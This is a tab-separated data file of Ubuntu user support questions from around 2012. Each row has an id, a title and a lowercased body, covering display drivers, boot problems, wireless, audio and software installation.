169725	xorg : number of created screens does not match number of detected devices	i 've been trying to configure my tv as external monitor , because the only thing i saw on it was a white background with a x as cursor . i tried around in the nvidia xserver settings , but i never got it working that it would disable the laptop monitor and move to my tv as soon as i 'd plug in the hdmi cable . after not beeing able to get it to work , i tought i 'd rename xorg.conf so it would create a default configuration again ( at least i tought it would ) . after a restart , i got the login screen . i entered my credentials , screen went black for a second , followed by a short sequence of the nvidia logo when it finally threw me back to the login screen . i tried logging in again , but same behaviour . i quickly booted to the root shell , renamed the old file back to xorg.conf , but it still would n't work . i then tried booting into failsafe mode , which told me that he could n't detect any screens . bootet up again , went to tty3 console , and tried the following : sudo service lightdm stop sudo xorg -configure this leads to number of created screems dpes mpt , match number of detected devices . configuration failed . ddxsiggiveup : closing log server terminated with error ( 2 ) . closing log file . also , i can only selected between ubuntu and ubuntu 2d at login , i tought there were some more options ? i 'm using default ubuntu 12.04 desktop . if you need any log files , please let me know which ones so i can provide them . thanks ! update : i tried this accepted answer . while using gdm i am able to login . as soon as i change it back to lightdm , i ca n't log in anymore . any idea ?
169727	how much space does ubuntu take up after it 's already installed ?	i know how much space is required to install ubuntu . how much space does a ubuntu installation take up on the disk ?
169728	skype only logs in as root	i just installed skype on my ubuntu 12.04 again and somehow i can only login if i start skype via root ( sudo skype ) in the terminal . if i try otherwise via dash or just `` skype '' without sudo permission i ca n't log in , it says `` login failed '' or `` sign in failed '' ( got the german version ) .
169731	apt downloading without my consent	i installed natty ( 11.04 ) and wanted to play a video . went through the process the cancelled because it was slow and files were relatively large unstable and it was late . ( internet very expensive for me ) . i copied the links to download later . i closed mplayer and went on surfing in firefox . surfing was not working properly . and i got an error using traceroute ( something about a buffer ) . in system monitor i noticed my connection was going at nearly its max speed ( 17kbps ) i checked netstat but i did n't show any thing that indicated which application was downloading . killed all open apps . didn’t fix i opened the software manager and it told me that another app was using apt . i didn’t find anyway to kill it so i had to restart . ( my uptime is usually around a month ) problem fixed on restart . # what is the root cause of this issue ? is there any app that can tell me what application is downloading what ? sorta like system monitor on windows or some firewalls on windows any per process firewalls for linux like the type i’m using on windows ( comodo ) ; doesn’t have to be open source .
169736	how much space do i need on my dvd-r for the livecd of 12.04 ?	i 'm going to install ubuntu version 12.04 but i do n't know how much space on an empty dvd-r or cd-r i would need . does anybody know ? also can you install ubuntu directly on your hard drive ? please help !
169742	grub shell greets me at boot-up , instead of a menu	after a fresh install of 10.04 , trying to boot yields grub > prompt . i am able to boot by typing root ( hd0,1 ) linux /vmlinuz-blqh-blqh root=/dev/sda3 initrd /init-blqh-blq root=/dev/sda3 boot grub says version 1.98 . i searched for a menu.lst entry , but turns out that is deprecated . i tried looking ad /etc/defauld/grub and /etc/grub.d , but i can not make anything of those files . how do i automate the booting process ? my system is single-boot .
169745	how to run a php file after installing lamp in ubuntu 11.10 ?	i installed lamp on ubuntu . apache2 and mysql are working fine . the folder apache2 is in /etc and contains : apache2.conf envvars magic mods-enabled sites-available conf.d httpd.conf mods-available ports.conf sites-enabled the httpd.conf file is empty . as far as windows is concerned apache had a `` www '' folder where we used to store our php files . what should i do in this case ? the tutorials given on the internet could not help ! : | please help !
169746	lubuntu hotspot starts up and then disconnects	i 'm need to use my laptop ( with lubuntu 12.04 ) as a wifi hotspot . i created the wifi hotspot via `` create new wireless network '' from the network connections menu . the hotspot comes up and then disconnects . i can see this on my android phone and tablet . i installed wifi analyser and shows the new network coming up . then suddenly after 2-3 minutes the new wifi network dissapears from the air . any ideas , suggestions ?
169751	best software for local contact/calendar sync to android ?	after 4 years on mac , i am switching back to ubuntu . for osx and for windows there are tons of apps that sync your contacts/calendar to android `` cloud-less '' over usb or bluetooth like syncmate , myphoneexplorer , missingsync , etc . i am looking for something that does the same on ubuntu . thanks a lot for your suggestions !
169754	laptop battery only changes to 29 %	i have a dell latitude e6400 laptop and recently installed ubuntu 12.04 . before , with windows xp , my battery would charge to 100 % . now , my battery charges to 29 % . no matter how long i charge it . any advice ?
169759	how to setup a lightweight keyboard-friendly window manager with add ons	i was looking for a lightweight windows manager with focus on doing things by keyboard . most of the lightweight desktop environment such as xfce or window manager such as fluxbox , etc. , does n't allow quick access to your applications . i really loved the way it is done in unity or gnome shell , all you have to do is type few letters of application/folder in dash . as far i remember , xfce does n't even allow you to navigate through app menu using first letters of the group/app and you have to either use arrow keys or mouse ! however , unity , gnome shell , etc. , are memory hogs . not that i 'm too hard pressed for resource with a 2.4 ghz core2duo and 4 gb ram , but if you run a few memory intensive apps like gimp or darktable , you really feel the need to release resources from window manager . so , the requirements are : lightweight window manager . ability to quickly launch applications by typing their name . a decent panel to display network , battery , date , etc . and minimized applications like jupiter , qbittorrent , autokey , etc . ease of setup so that one does n't have to spend eternity editing the text files . some graphic eyecandy would be a plus , but not necessary . please suggest some lightweight window manager + panel/docs , etc . that can fullfil the above requirement . i tried xmonad with suckless tools and xmobarrc with the help of following tutorials - http : //www.howtogeek.com/114728/how-to-use-xmonad-a-tiling-window-manager-for-linux/ it gives me a lightweight window manager but still leaves yearning for more ease .
169760	'python.h : no such file or directory ' while building pymedia	when i try to build/install pymedia , i get the following error : continue building pymedia ? [ y , n ] : y running install running build running build_py running build_ext building 'pymedia.audio.sound ' extension gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -dbuild_num=1869 -dpath_dev_dsp= '' /dev/dsp '' -dpath_dev_mixer= '' /dev/mixer '' -d_file_offset_bits=64 -daccel_detect=1 -dhave_mmx=1 -dhave_linux_dvd_struct=1 -ddvd_struct_in_linux_cdrom_h=1 -dconfig_vorbis -dconfig_vorbis -dconfig_faad -dconfig_mp3lame -dconfig_vorbis -dhave_av_config_h -dudf_cache=1 -inone -inone -inone -i/usr/include/lame -inone -i/home/selby/downloads/pymedia -isound/ -i/usr/include/python2.7 -c sound/sound.cpp -o build/temp.linux-i686-2 .7/sound/sound.o cc1plus : warning : command line option ‘-wstrict-prototypes’ is valid for ada/c/objc but not for c++ [ enabled by default ] sound/sound.cpp:23:20 : fatal error : python.h : no such file or directory compilation terminated . error : command 'gcc ' failed with exit status 1 i have no idea what it means or how to fix it , how do i install ?
169766	after replacing my preinstalled windows 7 with ubuntu , how do i get it back ?	i recently installed ubuntu 12.04 with grub . but now i have decided that i do n't like ubuntu and i want windows 7 back . how can i get it back ? i do n't have a windows 7 disc because windows 7 was pre installed on my laptop . so how can i get windows 7 back ?
169772	how to change keyboard layout ?	i 'm on ubuntu 12.04 . recently i bought a cheap apple style bluetooth keyboard . it pairs ok . i paired it with the current 102 key still attached . anyway i noticed that the character mapping is incorrect . most keys do not type anything - some keys on the right ( k , l , ; ' ) etc give numbers , but that 's about it . so i rebooted , with 102 kbd unattached , and the bluetooth keyboard on , ready to connect . after boot at the login screen , the bluetooth keyboard had paired . i typed my password , and it logged in fine ! ! however after the user login was complete it reverted to the broken behaviour . a glance at the layout chart shows ubuntu thinks i still have the 102 layout , even though it remained disconnected . any ideas ? thanks , dave
169776	copying folder from ntfs to ext4 partition	i am very new to the os so adhering the new things slowly but happily . my question is how to transfer folder from win7 ntfs partition to separate partition having ext4 file system ? i tried copy but at the destination drive the paste does n't get activate . edit : here 's what i got when typed in the terminal ~ $ mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda5 on /home type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/ramesh/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ramesh ) i am using the latest lts edition .
169778	why ca n't filezilla quick-connect to sourceforge any more ?	i use filezilla so as to access my project 's web space at sourceforge . there is no firewall blocking anything because i can successfully login using the 'sftp ' command via a terminal , but i want to use filezilla , because it is much easier this way to manage your files . filezilla used to work fine when i used 11.10 , now , when i open filezilla and fill in the following things : host : web.sourceforge.net username : username password : password port : 21 and , when i click on the quickconnect button on the right i immediately get this message : status : resolving address of web.sourceforge.net status : connecting to 216.34.181.70:21 ... status : connection attempt failed with `` econnrefused - connection refused by server '' . error : could not connect to server status : waiting to retry ... when i go to edit- > network configuration wizard ... i am not sure what to do in order to make it work . i will just mention what are the current settings i have according to what the configuration wizard says when i open it : 1st page : default transfer mode : passive allow fallback to other transfer mode on failure ( ticked ) 2nd page : use the server 's external ip address instead 3rd page : ask your operating system for the external ip address note here : the 3rd option on this page ( get external ip from the following url ) has from default the url http : //ip.filezilla-project.org/ip.php , which , when i open it at my browser , it gives 127.0.0.1 ( ! ) which , obviously , is not correct ! do n't use external ip address on local connections ( ticked ) 4th page : ask operating system for a port . 5th page : ( test results are the following : ) connecting to probe.filezilla-project.org response : 220 fz router and firewall tester ready user filezilla response : 331 give any password . pass 3.5.3 response : 230 logged on . checking for correct external ip address ip 192.168.1.254 bjc-bgi-b-cfe response : 510 mismatch . your ip is 6x.x.xxx.xxx , gc-b-cdi-cdh wrong external ip address connection closed it is obvious that the local ip address ( 192.168.1.254 ) is being sent to sourceforge , which is totally wrong ! any solution ?
169780	powerbook g4 ( 3,5 ) airport drivers	i 'm looking for the airport drivers for my powerbook g4 model 3,5 ( link ) where can i find those ?
169782	why does cfdisk give me an `` unsupported gpt '' error ?	number start ( sector ) end ( sector ) size code name 1 2048 409599 199.0 mib 0700 microsoft basic data 2 409600 608667647 290.0 gib 0700 microsoft basic data 3 608667648 616859647 3.9 gib 8200 linux swap 5 1026465792 1250263039 106.7 gib 0700 microsoft basic data 6 616863744 770463743 73.2 gib 8300 linux filesystem 7 770463744 771078143 300.0 mib ef02 linux filesystem 8 924067840 1026463743 48.8 gib 8300 linux filesystem 9 771078144 924067839 73.0 gib 8300 linux filesystem is what gdisk says my computer looks like ( well /dev/sda , but you know . ) anyway no matter which operating system i use etc every time cfdisk refuses to let me edit my hard drive why ? it always returns an error which is warning ! ! unsupported gpt ( guid partition table ) detected . use gnu parted . anyway the command i am running is sudo cfdisk /dev/sda which i think is proper for editing the /dev/sda partitions . anyway any idea as to how to stop this without completely reformatting my hard drive b/c i do n't like gdisk that much .
169789	how do i limit the workspaces borders ?	ubuntu 12.04 allows to move a window from a workspace to another using the mouse , but once in a while , that feature is very inconvenient because when the active window detaches from the top bar , it slips to the upper border and the top part of the window goes to the bottom workspace , which makes me change workspace in order grab it to the current workspace . so basically i just need , under certain circumstances , to treat every workspace independently , with locked borders , instead of having a giant workspace divided into four sections . is there any way to accomplish this ? ?
169790	how do you emulate a bluetooth keyboard ?	well i 'm using ubuntu 12.04 on a samsung r410 ( newer version ! ) and i have many bluetooth enabled devices with horrible virtual keyboards , and i would like to connect them to bluetooth keyboards , but i do n't have any so ca n't i use the keyboard on my laptop to control these devices ? by the way my computer 's bluetooth dongle is capable of such a thing . thanks in advance !
169797	should both alsa and pulseaudio be installed ?	i 'm confused about alsa and pulseaudio . should both be installed on my system at the same time ? do they conflict ? if so , which one is better to have ?
169803	missing general fonts after installing wine	i have problem with my font after installing flash & wine , font as arial , verdana , comic sanms , times new roman , tahoma , etc not found on my system . how to install it ?
169804	compile latest blender on ubuntu 12.0464bit ?	what i want is to compile latest blender from svn . i am using this guide my issues are : how can i install it with the final .deb created file and how can i give this package to a ppa ! so , when i execute sudo apt-get update ; sudo apt-get install subversion build-essential gettext \ libxi-dev libsndfile1-dev \ libpng12-dev libfftw3-dev \ libopenexr-dev libopenjpeg-dev \ libopenal-dev libalut-dev libvorbis-dev \ libglu1-mesa-dev libsdl1.2-dev libfreetype6-dev \ libtiff4-dev libavdevice-dev \ libavformat-dev libavutil-dev libavcodec-dev libjack-dev \ libswscale-dev libx264-dev libmp3lame-dev python3.2-dev \ libspnav-dev it gives me this the following packages have unmet dependencies : libjack-dev : depends : libjack0 ( = 1:0.121.0+svn4538-3ubuntu1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i know that skype does not allow the installation of those libraries . thanks
169809	cuda & msi gt60 with optimus enabled gtx670m ?	i have a msi gt60 laptop with an optimus enabled gtx 670m gpu , and i have been trying to get cuda going in ubuntu 12.04 environment . i realize that optimus is not supported in linux , but i have read the following post suggesting that cuda works for hybrid gpus . how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ? i installed the nvidia driver via sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current the resulting driver version is 302.17 , and supposedly gtx 670m is supported since 295.59 . i also downloaded cuda 4.2 from the nvidia site , and compiled it against nvidia-current libraries . unfortunately , when i run devicequery in the cuda sdk , i get the following output cudagetdevicecount returned 38 - > no cuda-capable device is detected checking /proc/driver/nvidia/gpus/0/information gives the following model : geforce gtx 670m irq : 16 gpu uuid : gpu- ? ? ? ? ? ? ? ? - ? ? ? ? - ? ? ? ? - ? ? ? ? - ? ? ? ? ? ? ? ? ? ? ? ? video bios : ? ? . ? ? . ? ? . ? ? . ? ? bus type : pci-e dma size : 32 bits dma mask : 0xffffffffff bus location : 0000:01.00.0 here is the output of `` lspci | grep vga '' 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 1213 ( rev ff ) so ... what am i doing wrong ? thanks !
169810	ubuntu desktop 12.04 lts blank screen after install	i downloaded ubuntu desktop 12.04 lts from the ubuntu website and ran the windows installer . it seems like the install completed successfully but when i tried to boot into ubuntu i just get a blank screen after i select ubuntu ( as opposed to windows ) . i am guessing my display configuration is not supported but i 'm not sure . is there a way to have the windows installer get the correct drivers for me ? i tried a redhat cd and had the same issue . i have an nvidia geforce gtx 460 v2 and i am using the hdmi output to go to a samsung display . i used an easy sbf linux boot cd to flash an andriod phone and it did not have any problems displaying the simple text in the console mode . thanks
169813	where did rhythmbox 's visualizations in 12.04 go ?	i can not seem to find the visualization options in rhythmbox anymore . were they left out from inclusion in ubuntu 12.04 ?
169814	how do i make the panel transparent in gnome classic mode ?	hi i do n't know to make the top panel in gnome classic transparent , i tried to right click then properties then change the transparency there but the indicator applet menu complete stays in the ambiance theme ... any help ?
169819	how can i make my system usable after modifying /usr/share/icons 's permissions ?	i 'm running a duel boot/partition machine with ubuntu 12.04 and windows 7 . on ubuntu os , i wanted to change the permissions in one of my directories so could extract files into that directory . in the terminal i entered chmod -r 777 /usr/share/icons which gives the owner , group , global read , write , and execute permissions . after i extracted the files into the directory , in the terminal i then entered chmod -r 644 /usr/share/icons which i believe gives the owner read and write permissions but the group and global read-only permissions . this was a mistake . after i entered this command , the entire system froze and some of the icons were missing . i restarted the computer and logged back in but it gave the same problem . the linux system has become inoperable . i 'm currently on my windows 7 os . does anyone know how to fix this ?
169822	usb faste or gige that `` just works '' with linux 2.6 kernels	i am trying to find a usb fastethernet or gigabitethernet that works without recompiling debian squeeze or ubuntu oneric . so far , i have tried the following usb gige adapters : belkin f4u047-rs sabrent usb-nt20 linksys usb300m apple mc704zm/a when i inserted them in a debian squeeze machine , all of them would show up as an interface in dmesg ; however , i could never get them to actually link up with an ethernet switch . i was using a cable that was known-good , and i was using an ethernet port that worked with the on-board gige jack . i know i can recompile and get the linksys usb300m working ; however , i have to get interfaces up quickly for any random linux server in our lab ( which are mostly debian / ubuntu ) . throughput is really a low priority for these , the need is mostly just basic network connectivity when i fire up a new motherboard , and the on-board gige is n't recognised for whatever reason ; other times , i may need a spare interface for a quick firewalling project .
169824	opengl games wo n't open due to x11	for some reason , any opengl game i try to play crashes when it wants to open the window . let me give you an example from running teeworlds from terminal : imnotanerd @ sys76laptop : ~ $ teeworlds # skip to the error [ 5015be1f ] [ gfx ] : unable to set video mode : x11 driver not configured with opengl [ 5015be1f ] [ gfx ] : out of ideas . failed to init graphics that x11 error will pop up with any opengl game i open . i 've been researching this ( without much luck ) and have seen that i should install sdl . ok , so on to libsdl.org , download source , ./configure & & make & & make install , no errors with that , and the same error still shows . any ideas on how to finally fix this ?
169828	disable “alt+`”	how do i disable the keyboard combination of alt+` . this is not the hud nor in the ubuntu system settings . it is not in compiz configuration either . ( i am not trying to disable the hud 's use of the alt key* ) when you press alt+` on a default unity ubuntu 12.04 install it behaves the same as alt + tab . i would like to disable this , because my windows 7 vm uses alt+` to switch languages such as korean or chinese .
169830	where do i get the `` ucode '' firmware for the intel centrino 6205 wireless adapter ?	anyone knows where can i find the iwlwifi-6000g2a-ucode-6.ucode firmware ?
169832	how to upgrade the linux kernel to version 3.4.7	translation ( via google translate ) : hello , i 'm wanting to upgrade the kernel of my linux version . i 'm currently using 3.2.0-27-generic-pae and want to switch to the latest 3.4.7 from the official site . more information on my computer : operating system : ubuntu version : 12.04 ( precise ) 32-bit gnome : 3.4.1 memory : 1.8 gib processor : intel 速 pentium ( r ) dual cpu e2220 @ 2.40ghz x 2
169834	wireless internet connection not working following update	after updating some packages last night my wireless on my toshiba satellite a210 is n't working . any suggestions how i can fix this ? cheers .
169835	where are mozc settings ?	here is how the mozc settings dialog is supposed to look like : but i ca n't find it anywhere in ubuntu , for instance here is the ibus dialog ( note how preferences is greyed out ) : where to find the mozc settings ? there are no mozc* executables on my path .
169837	memory requirements for ubuntu 12.04	i want to install ubuntu 12.04 on a computer with 1gb of memory , will that suffice ?
169838	how do i install the command line interface ?	i can not download any startup applications or updates . i can not trouble shoot the problem because i do not have command line interface access .
169843	how can i install nvidia driver from a .tar.gz ?	i 'm fairly new to ubuntu , so please , do n't suggest anything extremely advanced please . i downloaded my driver from the nvidia website , and i have a .tar.gz . i extracted it in the terminal , went to where it was extracted , and input ./config like i was told to , but it returned with 'no such file or directory exists ' . until i install the driver , my resolution will be stuck at 640x480 , so please , someone help . what am i doing wrong ?
169851	how do i to create a live-usb with unity 2d by default ?	i want to create a bootable live-usb to be able to run ubuntu on any machine i need , independently of its hardware specs . as there are some pentium iii and iv still around , how should i proceed to enable unity 2d on my live session by default instead of unity 3d ?
169859	how do i make my desktop look like windows 7 or 8 ?	i 'm wondering if there is a windows 7 gtk theme to download out there ? or maybe a windows 8 theme ?
169861	computer reboots when battery is critically low	i am using uubntu 12.04 , and i 've noticed that the computer reboots instead of suspending when the battery is critically low . it appears that this only happens when my laptop is unplugged . after rebooting once , the computers keeps rebooting until it is either plugged in or until it loses power . what is the usual cause of this issue , and how can it be resolved ?
169862	applications named with special characters not showing up in the dash	i recently downloaded and installed löve ( note the special character ) . if i type l in the dash , it is nowhere to be found . even if i just launched löve from the launcher , it does not show up in the `` recent apps '' section of the dash . is there an issue with apps with special character/the dash ? ?
169866	where can i find the right printer driver for my epson stylus photo 1400 ?	i am running ubuntu 11.10 and am new to linux . i have this great epson stylus photo 1400 printer which i love because it prints great quality photos and furthermore it can do wide format . but since i ditched windows and went with ubuntu i have n't been able to print to my epson . ( my hp deskjet works fine though ) when i first plugged in the epson to my laptop it 'found ' the new hardware and seemed to install it but would n't print to it . i have searched for other drivers and tried them but to no avail . found one on the epson site - epson-inkjet-printer-escpr_1.2.0-1lsb3.2_i386.deb - but it did n't work either . the printer shows up in my hardware list and the print job shows up in the queue , but nothing ever prints . does anybody know why this is happening ? remember i am new to linux , so is there something i 'm missing ? thanks in advance .
169871	ubuntu hangs on purple screen after external hd install	i am running ubuntu 11 on my home desktop , which was dual booted with windows 7 , and all was working great . today , i was trying to install ubuntu 12 to an external usb hard drive . i put in my ubuntu 12 disk , restarted , went through the install process setting up partitions on the external drive , etc etc . i am now having the hanging problem on the purple screen . this is whether or not the external hd is attached or not . i tried to run a boot-repair disk with recommended settings , and that did not work . i can see everything in grub loader , just doesnt seem to want to get into ubuntu . what else can i do ?
169873	12.04 - how to update alsa driver to 1.0.25	i have a relatively new intel `` ultrabook '' , the hp envy spectre xt . it has the idt 92hd99 sound card . support for this was added to alsa 1.0.25 based on this changelog : http : //www.alsa-project.org/main/index.php ? title=changes_v1.0.24_v1.0.25 & action=edit however the alsa driver version in ubuntu 12.04 is 1.0.24 . can someone explain how to update the alsa driver to 1.0.25 ? the alsa-base package says it 's using a package version 1.0.25-dfsg-0ubuntu1 . here is my alsa version info : ! ! alsa version ! ! -- -- -- -- -- -- driver version : 1.0.24 library version : 1.0.25 utilities version : 1.0.25 i think i need to get that `` driver version '' up to 1.0.25 to get support for my hardware . any help ? thanks .
169874	active ppa for latest stable chromium ?	i run chromium and used this ppa : https : //launchpad.net/~chromium-daily/+archive/stable i just realized that it seems to be abandoned and i 'm running a quite outdated version of this browser . there have not been any updates since the first of may this year . do you know of any ppa thats actively maintained ? thanks , trmpa ( yes , i know , i could use google chrome but i would like to go with chromium if possible . building from source is also not a good option . it 's not my own machine and i need updates to work reliably without much intervention from the user )
169876	how to boot to a ubuntu 12.04 installation which is not listed in grub2 anymore ?	i have a computer with 3 hard drives on it . i have ubuntu 12.04 on my newest and biggest hard drive and windows xp on my 2nd hard drive and a old version of ubuntu 7.04 on the third hard drive . everything was working perfectly and i was using grub to choose between the different systems . i was using windows xp and it automatically did some upgrades and the next time i tried to use windows xp , it would not not boot up . so i tried using the windows xp cd to repair it and i used a dos command like a dltmbr or something similar to it and when i tried to boot into ubuntu 12.04 it would not boot ! i tried the the boot-repair to fix it but it said that ubuntu 12.04 is not there and only windows xp and ubuntu 7.04 were the only selections . so i tried to install ubuntu 12.04 hoping it would find it and fix grub and it could not find it either . i installed a new version of ubuntu 12.04 over ubuntu 7.04 on the 3rd hard drive by mistake . it does not cause a problem and i can see my files in windows xp and ubuntu 12.04 on the first hard drive . when i installed ubuntu 12.04 on the first hard drive i created a separate home partition so all of my files are safe . i want to know how i can update grub or change something in ubuntu 12.04 on my first hard drive so it will boot up . i believe the kernel is missing and that is why grub ca n't find it . i need to access ubuntu 12.04 on my first hard drive because firefox has all of my bookmarks and cookies and i do n't want to start over again . any help on this would be great !
169879	two launcher entries for skype after skype-wrapper installation	i installed skype-wrapper because the skype default icon looks awful with the rest of the unity bar ( and i like the integration ) , and uninstalled the sni-qt package to remove the normal skype icon . now when i launch skype ( through skype-wrapper ) there are two icons for skype in the launcher : the top one is the skype-wrapper icon , with the unity quicklists and the mail count , etc . the bottom one is just a normal skype icon that 's not pinned to the launcher . did i do something wrong ? how can i fix it ?
169880	how can i change the xfce window manager to awesome ?	i 'd like to use the awesome window manager with all the other xfce4 environment daemons , like keyrings , panels , power managers , etc . is there a way to do this ?
169881	sound is muted on startup with ibook g4 ppc	i have ubuntu 12.04 running on a ibook g4 ppc . every time i restart my sound is muted , how do i make it so the sound is automatically on . sound does work , after bootup i can manually un-mute it
169885	how to install jad ?	i 'm very new to ubuntu . i need a way to install jad in my system . can anyone help me this out ?
169887	how can i detect a keylogger on my system ?	how could i know if there 's a keylogger in my system , or at least if one is active right now ?
169890	is there a default password for the ubuntu bootable stick ?	good day ... i made a bootable usb stick , with ubuntu 12.04 desktop ( and on my laptop ) . ( it does not work with my desktop ... the monitor goes to stand by ) . i was successful at getting ubuntu to boot . after using it for a while i was also successful at getting the computer to restart and then made a second stick . i managed to boot to ubuntu again and used it for a while . then i made the mistake of logging off before shutting the computer down . doing so took me to the logon page . when i tried to shut the computer down from there , nothing happened . i tried several times but it would not shut down . i also tried restart several times and it would not do that either . i do not know whether that is the way it is designed , or if that 's a new bug . and what i tried to log back on i get an ... incorrect password error message . is there a default password for the ubuntu bootable stick ? the directions on how to make the stick do not include anything about a default password . nor do they warn to create a password before doing anything else , so you do n't get stuck . the only two options are for it to be in hibernation or for the logon page to be displayed . i can find no way to get back to the boot selection menu . which means i do not even have any way of reinstalling an operating system . i hope someone can help ... have a nice day ... john ps , on looking through the faqs again to see if i might of missed something before , it looks like it may be suspended it rather than hibernating but the result is the same i ca n't do anything . also it did not have me provide it with the user name or password during the construction process .
169892	ca n't detect external monitor with a sis671 video card	i installed ubuntu 12.04 on my old laptop with sis671 video card and its working fine with 1280x800 screen resolution . i also connected my external monitor and its working too but i want to turn off laptop 's monitor and i ca n't find any references to external monitor . when i try to access system config > monitors it only shows `` laptop '' monitor . typing xrandr on terminal results : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1280 x 800 , maximum 1280 x 800 default connected 1280x800+0+0 0mm x 0mm 1280x800 60.0* 1024x768 75.0 70.0 60.0 800x600 75.0 72.0 60.0 56.0 640x480 75.0 73.0 60.0 how can i turn my laptop monitor off and use only the external monitor ? thanks ...
169899	why did port 3000 suddenly start getting used by ppp ? how to disable ?	i run a rails development environment , which runs a server i can access at localhost:3000 . i was doing this again today , and went to restart the webserver and it started timing out . after some time i ran nmap localhost , and realised that 'ppp ' is running on port 3000 : 3000/tcp open ppp i 've never used ppp , and it 's stopping me getting my work done . i tried service pppd-dns stop , which appears to have no effect . i even tried sudo apt-get remove ppp , but the port is still open , and i still ca n't start my rails server .
169901	print from dosbox	am running some legacy software for my business , which runs on dbase 5 , which has been updated over the years with a great deal of investment in time ; this runs our finances , ordering , etc . pretty well . in order to be able to switch my business to ubuntu ( which i would like to do ) , i have to be able to run these programs , and particularly print data . i have tried printing in dosemu , but that locks the program up , have tried dosbox , which seems to be more stable and runs things fine , but will not print . so i tried printing to a file in dosbox and have this manually printed with : lp -d hp-laserjet-m2727-mfp /home/paul/dosdrive/*.prn and that prints fine , but i have to leave the program and close dosbox before the file shows in ubuntu and i can print it ; not ideal for a business package . i have found a dosbox svn daum , which i have tried on an xp machine , is stable and prints fine , but this is only available for windows . the source code is available for this program , but compiling this is well beyond my expertise . is there any way around all this ?
169908	how can i bring all windows of an application to the front ?	sometimes i want to bring all the windows of one application to the top . it seems that the only way to do this in unity currently is to switch to each window individually ( either by using alt-tab , clicking on the launcher icon and selecting each window , or minimizing all other windows ) . i 'm guessing it 's possible to hack something together using wmctrl to do this but i 'm hoping for a simpler solution .
169911	unable to connect to wireless networks after 12.04 automatic update	i have downloaded and installed ubuntu 12.04 x64 and ran automatic update.after which though i see them but am unable to create or connect to any wireless networks ( ad-hoc or existing ) .
169912	fb : conflicting fb hw usage inteldrmfb vs efi vga - removing generic driver	ubuntu fails to boot . ( it was working fine for the last moth . ) selecting `` recovery mode '' shows the message : fb : conflicting fb hw usage inteldrmfb vs efi vga - removing generic driver however , after this message is shown , the system still does not boot .
169914	user & group of a file changed after rebooting and login as another user	i am using ubuntu 12.04 in virtualbox , and i created two accounts with usernames lyg and ygl . i found a directory vboxadditions_4.1.18_78361/ in /media , questions got into my mind when i type `` ls -l /media/ '' in my terminal . below are two outputs : when i boot and login as lyg , -xr-xr-x 4 lyg lyg 2048 jun 5 22:33 vboxadditions_4.1.18_78361 reboot and login as ygl , -xr-xr-x 4 ygl ygl 2048 jun 5 22:33 vboxadditions_4.1.18_78361 so , why do the user and group change ?
169915	read errors when installing on a 2009 macbook pro from cd	i tried to install 12.04 ( 32 bit ) on my 2009 mbp from cd . partitioning , setting the timezone and entering the user name and password for the first user worked just fine , but just a few seconds after that the install failed several times with a read error from the cd . i tried another cd , but with the same results , so i think it 's neither the cd nor the drive . then i tried to boot from a flash drive as described on here , but it did n't even show up in the list of available boot volumes . pretty unsatisfactory . i 've used several flavours of ubuntu since 6.06 on several pcs , even an old sparc workstation , and none of them gave me nearly as much trouble as any piece of apple hardware i 've tried .
169916	battery information on fluxbox	how can i get my battery info ( percentages ) on fluxbox ? i 've heard of the gnome-power-manager , and wanted to use that , but there seems to be a problem ... $ gnome-power-manager gnome-power-manager : command not found and when i try to install it : $ sudo apt-get install gnome-power-manager reading package lists ... done building dependency tree reading state information ... done gnome-power-manager is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 141 not upgraded . i reinstalled it , and still the same situation ! apparently it 's installed , but ubuntu does n't recognize the command . also , i do n't really like wmbattery , i 'd like something that exists next to those applets and other icons ( nm-applet , sound , skype , etc ) . i have highlighted the area i would like to have the battery information applet at :
169920	ubuntu does n't boot because of graphics problem	while booting my ubuntu 12.04 i got an error telling my that my graphics is not identified and i have to identify it manually by modifying some configurations . and then it allows me the choose from few options : login with minimal graphics for one session : it shows a finished progress bar , clicking `` ok '' opens a fullscreen terminal that i ca n't control , it only shows some process starting and ending ( apache2 , bind , etc ) . troubleshoot the problem : it shows few options ( logs , etc ) i chose to see a log , walked through it really fast , nothing suspicious . and there was startup logs aswell , which was empty . and finally a reconfigure option which does n't work . reconfigure graphics : it shows 2 options , apply generic configurations and use backed-up configurations , since i do n't have backed-up configurations , i chose the first one - which did n't work . i 'm using amd graphics card . i did n't change anything related to graphics card . the last program i installed is filezilla ( i 'm not sure though ) . the problem is that i do n't have any backups , also i installed ubuntu via wubi ( dual-booting with win7 ) , which means i ca n't access my files to get them and re-install peacefully since i do n't have any partitions to access . any help would be appreciated .
169928	lubuntu 12.04 , what is the best method to upload pics from my canon powershot a520-a510	in lubuntu 12.04 , what is the best method to upload pics from my canon powershot a520-a510 camera ? do i need to install an app ? if so , which app do you recommend . i am new to linux , and presently settled on lubuntu .
